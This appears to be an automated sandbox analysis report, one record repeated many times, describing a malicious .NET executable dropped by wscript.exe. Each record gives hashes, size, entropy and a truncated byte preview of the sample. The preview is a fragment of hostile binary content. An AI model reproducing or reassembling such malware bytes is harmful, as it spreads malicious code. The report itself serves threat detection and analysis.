                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
